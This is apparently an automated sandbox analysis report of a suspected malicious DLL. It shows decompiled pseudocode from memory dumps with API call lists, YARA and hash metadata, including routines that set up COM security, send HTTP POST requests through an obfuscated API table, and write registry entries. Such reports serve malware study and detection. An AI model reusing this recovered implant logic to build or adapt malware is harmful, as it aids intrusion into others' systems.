                                    							_v20 = _t252;
                                    							__eflags = _t262;
                                    							if(_t262 != 0) {
                                    								continue;
                                    							}
                                    							L48:
                                    							_t324 = _v40;
                                    							goto L49;
                                    						}
                                    						_t247 = _v28;
                                    						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                    						goto L42;
                                    					}
                                    					_t262 = _v32;
                                    					goto L48;
                                    				} else {
                                    					E1000861A( &_v36, _t322);
                                    					_t320 = _v36;
                                    					goto L53;
                                    				}
                                    			}

                                    APIs
                                      • Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
                                      • Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                                      • Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                                      • Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
                                      • Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                                      • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                    • SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
                                    • SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
                                    • SysFreeString.OLEAUT32(?), ref: 1000DF82
                                    • SysFreeString.OLEAUT32(?), ref: 1000DF8B
                                      • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
                                    • String ID: FALSE$TRUE
                                    • API String ID: 224402418-1412513891
                                    • Opcode ID: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
                                    • Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
                                    • Opcode Fuzzy Hash: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
                                    • Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 83%
                                    			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                                    				char _v8;
                                    				char _v12;
                                    				signed int _v16;
                                    				signed int _v20;
                                    				char _v24;
                                    				intOrPtr _v28;
                                    				char _v32;
                                    				intOrPtr _v36;
                                    				signed int _v40;
                                    				signed int _v44;
                                    				intOrPtr _v48;
                                    				intOrPtr _v52;
                                    				intOrPtr _v56;
                                    				intOrPtr _v60;
                                    				char _v64;
                                    				int _v76;
                                    				void* _v80;
                                    				intOrPtr _v100;
                                    				int _v104;
                                    				void* _v108;
                                    				intOrPtr _v112;
                                    				intOrPtr _v116;
                                    				char* _v120;
                                    				void _v124;
                                    				char _v140;
                                    				void _v396;
                                    				void _v652;
                                    				intOrPtr _t105;
                                    				intOrPtr _t113;
                                    				intOrPtr* _t115;
                                    				intOrPtr _t118;
                                    				intOrPtr _t121;
                                    				intOrPtr _t124;
                                    				intOrPtr _t127;
                                    				intOrPtr _t131;
                                    				char _t133;
                                    				intOrPtr _t136;
                                    				char _t138;
                                    				char _t139;
                                    				intOrPtr _t141;
                                    				intOrPtr _t147;
                                    				intOrPtr _t154;
                                    				intOrPtr _t158;
                                    				intOrPtr _t162;
                                    				intOrPtr _t164;
                                    				intOrPtr _t166;
                                    				intOrPtr _t172;
                                    				intOrPtr _t176;
                                    				void* _t183;
                                    				void* _t185;
                                    				intOrPtr _t186;
                                    				char _t195;
                                    				intOrPtr _t203;
                                    				intOrPtr _t204;
                                    				signed int _t209;
                                    				void _t212;
                                    				intOrPtr _t213;
                                    				void* _t214;
                                    				intOrPtr _t216;
                                    				char _t217;
                                    				intOrPtr _t218;
                                    				signed int _t219;
                                    				signed int _t220;
                                    				void* _t221;
                                    
                                    				_v40 = _v40 & 0x00000000;
                                    				_v24 = 4;
                                    				_v36 = 1;
                                    				_t214 = __edx;
                                    				memset( &_v396, 0, 0x100);
                                    				memset( &_v652, 0, 0x100);
                                    				_v64 = E100095C7(0x85b);
                                    				_v60 = E100095C7(0xdc9);
                                    				_v56 = E100095C7(0x65d);
                                    				_v52 = E100095C7(0xdd3);
                                    				_t105 = E100095C7(0xb74);
                                    				_v44 = _v44 & 0;
                                    				_t212 = 0x3c;
                                    				_v48 = _t105;
                                    				memset( &_v124, 0, 0x100);
                                    				_v116 = 0x10;
                                    				_v120 =  &_v140;
                                    				_v124 = _t212;
                                    				_v108 =  &_v396;
                                    				_v104 = 0x100;
                                    				_v80 =  &_v652;
                                    				_push( &_v124);
                                    				_push(0);
                                    				_v76 = 0x100;
                                    				_push(E1000C379(_t214));
                                    				_t113 =  *0x1001e6a4; // 0x0
                                    				_push(_t214);
                                    				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                                    					_t209 = 0;
                                    					_v20 = 0;
                                    					do {
                                    						_t115 =  *0x1001e6a4; // 0x0
                                    						_v12 = 0x8404f700;
                                    						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                                    						if(_t213 != 0) {
                                    							_t195 = 3;
                                    							_t185 = 4;
                                    							_v8 = _t195;
                                    							_t118 =  *0x1001e6a4; // 0x0
                                    							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                                    							_v8 = 0x3a98;
                                    							_t121 =  *0x1001e6a4; // 0x0
                                    							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                                    							_v8 = 0x493e0;
                                    							_t124 =  *0x1001e6a4; // 0x0
                                    							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                                    							_v8 = 0x493e0;
                                    							_t127 =  *0x1001e6a4; // 0x0
                                    							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                                    							_t131 =  *0x1001e6a4; // 0x0
                                    							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                                    							if(_a24 != 0) {
                                    								E1000980C(_a24);
                                    							}
                                    							if(_t186 != 0) {
                                    								_t133 = 0x8484f700;
                                    								if(_v112 != 4) {
                                    									_t133 = _v12;
                                    								}
                                    								_t136 =  *0x1001e6a4; // 0x0
                                    								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                                    								_v8 = _t216;
                                    								if(_a24 != 0) {
                                    									E1000980C(_a24);
                                    								}
                                    								if(_t216 != 0) {
                                    									_t138 = 4;
                                    									if(_v112 != _t138) {
                                    										L19:
                                    										_t139 = E100095C7(0x777);
                                    										_t217 = _t139;
                                    										_v12 = _t217;
                                    										_t141 =  *0x1001e6a4; // 0x0
                                    										_t218 = _v8;
                                    										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
                                    										E100085C2( &_v12);
                                    										if(_a24 != 0) {
                                    											E1000980C(_a24);
                                    										}
                                    										if(_v28 != 0) {
                                    											L28:
                                    											_v24 = 8;
                                    											_push(0);
                                    											_v32 = 0;
                                    											_v28 = 0;
                                    											_push( &_v24);
                                    											_push( &_v32);
                                    											_t147 =  *0x1001e6a4; // 0x0
                                    											_push(0x13);
                                    											_push(_t218);
                                    											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                                    												_t219 = E10009749( &_v32);
                                    												if(_t219 == 0xc8) {
                                    													 *_a20 = _v8;
                                    													 *_a12 = _t213;
                                    													 *_a16 = _t186;
                                    													return 0;
                                    												}
                                    												_t220 =  ~_t219;
                                    												L32:
                                    												_t154 =  *0x1001e6a4; // 0x0
                                    												 *((intOrPtr*)(_t154 + 8))(_v8);
                                    												L33:
                                    												if(_t186 != 0) {
                                    													_t158 =  *0x1001e6a4; // 0x0
                                    													 *((intOrPtr*)(_t158 + 8))(_t186);
                                    												}
                                    												if(_t213 != 0) {
                                    													_t203 =  *0x1001e6a4; // 0x0
                                    													 *((intOrPtr*)(_t203 + 8))(_t213);
                                    												}
                                    												return _t220;
                                    											}
                                    											GetLastError();
                                    											_t220 = 0xfffffff8;
                                    											goto L32;
                                    										} else {
                                    											GetLastError();
                                    											_t162 =  *0x1001e6a4; // 0x0
                                    											 *((intOrPtr*)(_t162 + 8))(_t218);
                                    											_t218 = 0;
                                    											goto L23;
                                    										}
                                    									}
                                    									_v12 = _t138;
                                    									_push( &_v12);
                                    									_push( &_v16);
                                    									_t172 =  *0x1001e6a4; // 0x0
                                    									_push(0x1f);
                                    									_push(_t216);
                                    									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                                    										L18:
                                    										GetLastError();
                                    										goto L19;
                                    									}
                                    									_v16 = _v16 | 0x00003380;
                                    									_push(4);
                                    									_push( &_v16);
                                    									_t176 =  *0x1001e6a4; // 0x0
                                    									_push(0x1f);
                                    									_push(_t216);
                                    									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                                    										goto L19;
                                    									}
                                    									goto L18;
                                    								} else {
                                    									GetLastError();
                                    									L23:
                                    									_t164 =  *0x1001e6a4; // 0x0
                                    									 *((intOrPtr*)(_t164 + 8))(_t186);
                                    									_t186 = 0;
                                    									goto L24;
                                    								}
                                    							} else {
                                    								GetLastError();
                                    								L24:
                                    								_t166 =  *0x1001e6a4; // 0x0
                                    								 *((intOrPtr*)(_t166 + 8))(_t213);
                                    								_t213 = 0;
                                    								goto L25;
                                    							}
                                    						}
                                    						GetLastError();
                                    						L25:
                                    						_t204 = _t218;
                                    						_t209 = _v20 + 1;
                                    						_v20 = _t209;
                                    					} while (_t209 < 2);
                                    					_v8 = _t218;
                                    					if(_t204 != 0) {
                                    						goto L28;
                                    					}
                                    					_t220 = 0xfffffffe;
                                    					goto L33;
                                    				}
                                    				_t183 = 0xfffffffc;
                                    				return _t183;
                                    			}

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: memset$ErrorLast
                                    • String ID: POST
                                    • API String ID: 2570506013-1814004025
                                    • Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                                    • Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
                                    • Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                                    • Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 28%
                                    			E100116B8(signed int* _a4) {
                                    				char _v8;
                                    				_Unknown_base(*)()* _v12;
                                    				_Unknown_base(*)()* _v16;
                                    				char _v20;
                                    				_Unknown_base(*)()* _t16;
                                    				_Unknown_base(*)()* _t17;
                                    				void* _t22;
                                    				intOrPtr* _t28;
                                    				signed int _t29;
                                    				signed int _t30;
                                    				struct HINSTANCE__* _t32;
                                    				void* _t34;
                                    
                                    				_t30 = 0;
                                    				_v8 = 0;
                                    				_t32 = GetModuleHandleA("advapi32.dll");
                                    				if(_t32 == 0) {
                                    					L9:
                                    					return 1;
                                    				}
                                    				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
                                    				_v12 = _t16;
                                    				if(_t16 == 0) {
                                    					goto L9;
                                    				}
                                    				_t17 = GetProcAddress(_t32, "CryptGenRandom");
                                    				_v16 = _t17;
                                    				if(_t17 == 0) {
                                    					goto L9;
                                    				}
                                    				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
                                    				if(_t28 == 0) {
                                    					goto L9;
                                    				}
                                    				_push(0xf0000000);
                                    				_push(1);
                                    				_push(0);
                                    				_push(0);
                                    				_push( &_v8);
                                    				if(_v12() == 0) {
                                    					goto L9;
                                    				}
                                    				_t22 = _v16(_v8, 4,  &_v20);
                                    				 *_t28(_v8, 0);
                                    				if(_t22 == 0) {
                                    					goto L9;
                                    				}
                                    				_t29 = 0;
                                    				do {
                                    					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
                                    					_t29 = _t29 + 1;
                                    				} while (_t29 < 4);
                                    				 *_a4 = _t30;
                                    				return 0;
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
                                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
                                    • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
                                    • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                    • API String ID: 667068680-129414566
                                    • Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                                    • Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
                                    • Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                                    • Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 87%
                                    			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                    				signed int _t12;
                                    				signed int _t13;
                                    				int _t15;
                                    				char* _t24;
                                    				char* _t26;
                                    				char* _t28;
                                    				char* _t29;
                                    				signed int _t40;
                                    				char* _t43;
                                    				char* _t45;
                                    				long long* _t47;
                                    
                                    				_t12 = _a20;
                                    				if(_t12 == 0) {
                                    					_t12 = 0x11;
                                    				}
                                    				_t26 = _a4;
                                    				_push(_t30);
                                    				 *_t47 = _a12;
                                    				_push(_t12);
                                    				_push("%.*g");
                                    				_push(_a8);
                                    				_push(_t26);
                                    				L10012285();
                                    				_t40 = _t12;
                                    				if(_t40 < 0 || _t40 >= _a8) {
                                    					L19:
                                    					_t13 = _t12 | 0xffffffff;
                                    					goto L20;
                                    				} else {
                                    					L100122CD();
                                    					_t15 =  *((intOrPtr*)( *_t12));
                                    					if(_t15 != 0x2e) {
                                    						_t24 = strchr(_t26, _t15);
                                    						if(_t24 != 0) {
                                    							 *_t24 = 0x2e;
                                    						}
                                    					}
                                    					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                                    						L11:
                                    						_t43 = strchr(_t26, 0x65);
                                    						_t28 = _t43;
                                    						if(_t43 == 0) {
                                    							L18:
                                    							_t13 = _t40;
                                    							L20:
                                    							return _t13;
                                    						}
                                    						_t45 = _t43 + 1;
                                    						_t29 = _t28 + 2;
                                    						if( *_t45 == 0x2d) {
                                    							_t45 = _t29;
                                    						}
                                    						while( *_t29 == 0x30) {
                                    							_t29 = _t29 + 1;
                                    						}
                                    						if(_t29 != _t45) {
                                    							E10008706(_t45, _t29, _t40 - _t29 + _a4);
                                    							_t40 = _t40 + _t45 - _t29;
                                    						}
                                    						goto L18;
                                    					} else {
                                    						_t6 = _t40 + 3; // 0x100109b2
                                    						_t12 = _t6;
                                    						if(_t12 >= _a8) {
                                    							goto L19;
                                    						}
                                    						_t26[_t40] = 0x302e;
                                    						( &(_t26[2]))[_t40] = 0;
                                    						_t40 = _t40 + 2;
                                    						goto L11;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: strchr$_snprintflocaleconv
                                    • String ID: %.*g
                                    • API String ID: 1910550357-952554281
                                    • Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                                    • Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
                                    • Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                                    • Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _snprintfqsort
                                    • String ID: %I64d$false$null$true
                                    • API String ID: 756996078-4285102228
                                    • Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                                    • Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
                                    • Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                                    • Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 79%
                                    			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                                    				char _v516;
                                    				void _v1044;
                                    				char _v1076;
                                    				signed int _v1080;
                                    				signed int _v1096;
                                    				WCHAR* _v1100;
                                    				intOrPtr _v1104;
                                    				signed int _v1108;
                                    				intOrPtr _v1112;
                                    				intOrPtr _v1116;
                                    				char _v1144;
                                    				char _v1148;
                                    				void* __esi;
                                    				intOrPtr _t66;
                                    				intOrPtr _t73;
                                    				signed int _t75;
                                    				intOrPtr _t76;
                                    				signed int _t81;
                                    				WCHAR* _t87;
                                    				void* _t89;
                                    				signed int _t90;
                                    				signed int _t91;
                                    				signed int _t93;
                                    				signed int _t94;
                                    				WCHAR* _t96;
                                    				intOrPtr _t106;
                                    				intOrPtr _t107;
                                    				void* _t108;
                                    				intOrPtr _t109;
                                    				signed char _t116;
                                    				WCHAR* _t118;
                                    				void* _t122;
                                    				signed int _t123;
                                    				intOrPtr _t125;
                                    				void* _t128;
                                    				void* _t129;
                                    				WCHAR* _t130;
                                    				void* _t134;
                                    				void* _t141;
                                    				void* _t143;
                                    				WCHAR* _t145;
                                    				signed int _t153;
                                    				void* _t154;
                                    				void* _t178;
                                    				signed int _t180;
                                    				void* _t181;
                                    				void* _t183;
                                    				void* _t187;
                                    				signed int _t188;
                                    				WCHAR* _t190;
                                    				signed int _t191;
                                    				signed int _t192;
                                    				intOrPtr* _t194;
                                    				signed int _t196;
                                    				void* _t199;
                                    				void* _t200;
                                    				void* _t201;
                                    				void* _t202;
                                    				intOrPtr* _t203;
                                    				void* _t208;
                                    
                                    				_t208 = __fp0;
                                    				_push(_t191);
                                    				_t128 = __edx;
                                    				_t187 = __ecx;
                                    				_t192 = _t191 | 0xffffffff;
                                    				memset( &_v1044, 0, 0x20c);
                                    				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
                                    				_v1108 = 1;
                                    				if(_t187 != 0) {
                                    					_t123 =  *0x1001e688; // 0x8a40590
                                    					_t125 =  *0x1001e68c; // 0x8abfc68
                                    					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
                                    				}
                                    				if(E1000BB8D(_t187) != 0) {
                                    					L4:
                                    					_t134 = _t128;
                                    					_t66 = E1000B7A8(_t134,  &_v516);
                                    					_push(_t134);
                                    					_v1104 = _t66;
                                    					E1000B67D(_t66,  &_v1076, _t206, _t208);
                                    					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
                                    					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
                                    					E1000B88A(_t141,  &_v1100, _t208);
                                    					_t175 =  &_v1076;
                                    					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
                                    					_v1112 = _t73;
                                    					_t143 = _t141;
                                    					if(_t73 != 0) {
                                    						_push(0);
                                    						_push(_t129);
                                    						_push("\\");
                                    						_t130 = E100092E5(_t73);
                                    						_t200 = _t199 + 0x10;
                                    						_t75 =  *0x1001e688; // 0x8a40590
                                    						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
                                    						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
                                    							L12:
                                    							__eflags = _v1108;
                                    							if(__eflags != 0) {
                                    								_t76 = E100091E3(_v1112);
                                    								_t145 = _t130;
                                    								 *0x1001e740 = _t76;
                                    								 *0x1001e738 = E100091E3(_t145);
                                    								L17:
                                    								_push(_t145);
                                    								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
                                    								_t201 = _t200 + 0x10;
                                    								__eflags = _t188;
                                    								if(_t188 == 0) {
                                    									goto L41;
                                    								}
                                    								_push(0x1001b9ca);
                                    								E10009F48(0xe);
                                    								E10009F6C(_t188, _t208, _t130);
                                    								_t194 = _a4;
                                    								_v1096 = _v1096 & 0x00000000;
                                    								_push(2);
                                    								_v1100 =  *_t194;
                                    								_push(8);
                                    								_push( &_v1100);
                                    								_t178 = 0xb;
                                    								E1000A0AB(_t188, _t178, _t208);
                                    								_t179 =  *(_t194 + 0x10);
                                    								_t202 = _t201 + 0xc;
                                    								__eflags =  *(_t194 + 0x10);
                                    								if( *(_t194 + 0x10) != 0) {
                                    									E1000A3ED(_t188, _t179, _t208);
                                    								}
                                    								_t180 =  *(_t194 + 0xc);
                                    								__eflags = _t180;
                                    								if(_t180 != 0) {
                                    									E1000A3ED(_t188, _t180, _t208);
                                    								}
                                    								_t87 = E1000980C(0);
                                    								_push(2);
                                    								_v1100 = _t87;
                                    								_t153 = _t188;
                                    								_push(8);
                                    								_v1096 = _t180;
                                    								_push( &_v1100);
                                    								_t181 = 2;
                                    								_t89 = E1000A0AB(_t153, _t181, _t208);
                                    								_t203 = _t202 + 0xc;
                                    								__eflags = _v1108;
                                    								if(_v1108 == 0) {
                                    									_t153 =  *0x1001e688; // 0x8a40590
                                    									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
                                    									if(__eflags != 0) {
                                    										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
                                    										_t203 = _t203 + 0xc;
                                    										goto L26;
                                    									}
                                    									_t153 = _t153 + 0x228;
                                    									goto L25;
                                    								} else {
                                    									_t91 =  *0x1001e688; // 0x8a40590
                                    									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
                                    									if(__eflags != 0) {
                                    										L32:
                                    										__eflags =  *(_t91 + 0x1898) & 0x00000082;
                                    										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
                                    											_t183 = 0x64;
                                    											E1000E23E(_t183);
                                    										}
                                    										E100052C0( &_v1076, _t208);
                                    										_t190 = _a8;
                                    										_t154 = _t153;
                                    										__eflags = _t190;
                                    										if(_t190 != 0) {
                                    											_t94 =  *0x1001e688; // 0x8a40590
                                    											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
                                    											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
                                    												lstrcpyW(_t190, _t130);
                                    											} else {
                                    												_t96 = E1000109A(_t154, 0x228);
                                    												_v1100 = _t96;
                                    												lstrcpyW(_t190, _t96);
                                    												E100085D5( &_v1100);
                                    												 *_t203 = "\"";
                                    												lstrcatW(_t190, ??);
                                    												lstrcatW(_t190, _t130);
                                    												lstrcatW(_t190, "\"");
                                    											}
                                    										}
                                    										_t93 = _a12;
                                    										__eflags = _t93;
                                    										if(_t93 != 0) {
                                    											 *_t93 = _v1104;
                                    										}
                                    										_t192 = 0;
                                    										__eflags = 0;
                                    										goto L41;
                                    									}
                                    									_t51 = _t91 + 0x228; // 0x8a407b8
                                    									_t153 = _t51;
                                    									L25:
                                    									_t90 = E1000553F(_t153, _t130, __eflags);
                                    									L26:
                                    									__eflags = _t90;
                                    									if(_t90 >= 0) {
                                    										_t91 =  *0x1001e688; // 0x8a40590
                                    										goto L32;
                                    									}
                                    									_push(0xfffffffd);
                                    									L6:
                                    									_pop(_t192);
                                    									goto L41;
                                    								}
                                    							}
                                    							_t106 = E1000C292(_v1104, __eflags);
                                    							_v1112 = _t106;
                                    							_t107 =  *0x1001e684; // 0x8abfaa0
                                    							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                                    							__eflags = _t108 - _t192;
                                    							if(_t108 != _t192) {
                                    								_t109 =  *0x1001e684; // 0x8abfaa0
                                    								 *((intOrPtr*)(_t109 + 0x30))();
                                    								E1000861A( &_v1148, _t192);
                                    								_t145 = _t108;
                                    								goto L17;
                                    							}
                                    							E1000861A( &_v1144, _t192);
                                    							_t81 = 1;
                                    							goto L42;
                                    						}
                                    						_t116 =  *(_t75 + 0x1898);
                                    						__eflags = _t116 & 0x00000004;
                                    						if((_t116 & 0x00000004) == 0) {
                                    							__eflags = _t116;
                                    							if(_t116 != 0) {
                                    								goto L12;
                                    							}
                                    							L11:
                                    							E1000E286(_v1112, _t175);
                                    							goto L12;
                                    						}
                                    						_v1080 = _v1080 & 0x00000000;
                                    						_t118 = E100095E1(_t143, 0x879);
                                    						_v1100 = _t118;
                                    						_t175 = _t118;
                                    						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
                                    						E100085D5( &_v1100);
                                    						_t200 = _t200 + 0x14;
                                    						goto L11;
                                    					}
                                    					_push(0xfffffffe);
                                    					goto L6;
                                    				} else {
                                    					_t122 = E10002BA4( &_v1044, _t192, 0x105);
                                    					_t206 = _t122;
                                    					if(_t122 == 0) {
                                    						L41:
                                    						_t81 = _t192;
                                    						L42:
                                    						return _t81;
                                    					}
                                    					goto L4;
                                    				}
                                    			}
                                    0x10004a77
                                    0x10004a79
                                    0x10004d64
                                    0x10004d64
                                    0x10004d66
                                    0x10004d6c
                                    0x10004d6c
                                    0x00000000
                                    0x10004a79

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$memset
                                    • String ID:
                                    • API String ID: 1985475764-0
                                    • Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                                    • Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
                                    • Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
                                    • Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SysAllocString.OLEAUT32(00000000), ref: 1000D75C
                                    • SysAllocString.OLEAUT32(?), ref: 1000D764
                                    • SysAllocString.OLEAUT32(00000000), ref: 1000D778
                                    • SysFreeString.OLEAUT32(?), ref: 1000D7F3
                                    • SysFreeString.OLEAUT32(?), ref: 1000D7F6
                                    • SysFreeString.OLEAUT32(?), ref: 1000D7FB
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: String$AllocFree
                                    • String ID:
                                    • API String ID: 344208780-0
                                    • Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                                    • Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
                                    • Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
                                    • Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
